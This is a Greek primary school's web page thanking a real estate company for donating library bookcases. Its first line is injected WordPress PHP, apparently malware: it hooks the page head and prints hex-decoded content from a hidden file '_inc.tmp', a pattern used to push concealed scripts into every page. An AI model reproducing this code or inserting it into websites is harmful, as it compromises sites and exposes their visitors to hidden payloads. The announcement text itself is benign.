if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Ευχαριστίες για δωρεά στο σχολείο μας |

Ευχαριστίες για δωρεά στο σχολείο μας

Οι μαθητές, οι μαθήτριες και το διδακτικό προσωπικό του σχολείου μας εκφράζουν τις θερμές τους ευχαριστίες στην Open Real Estate ΙΚΕ, τον γενικό υπεύθυνο, κ. Γρηγόρη Ντάσκα και τους συνεργάτες του για την ευγενική τους πρωτοβουλία να δωρίσουν στο σχολείο μας τέσσερις βιβλιοθήκες που ομόρφυναν την αίθουσα της βιβλιοθήκης μας και φιλοξενούν ήδη υπέροχες σειρές βιβλίων. Σας ευχαριστούμε από καρδιάς για τη διαχρονική και διαρκή στήριξή σας στις προσπάθειές μας για την αναβάθμιση του σχολείου μας.

Ο Διευθυντής του Δημοτικού Σχολείου Λεωνιδίου κ. Βασίλειος Αυγέρης στη συνάντηση που πραγματοποιήθηκε κατά τη διαδικασία παράδοσης με τη Διευθύντρια Πωλήσεων της Open Real Estate, κa Ναταλία Τσουκαράκη-Γιαννούση.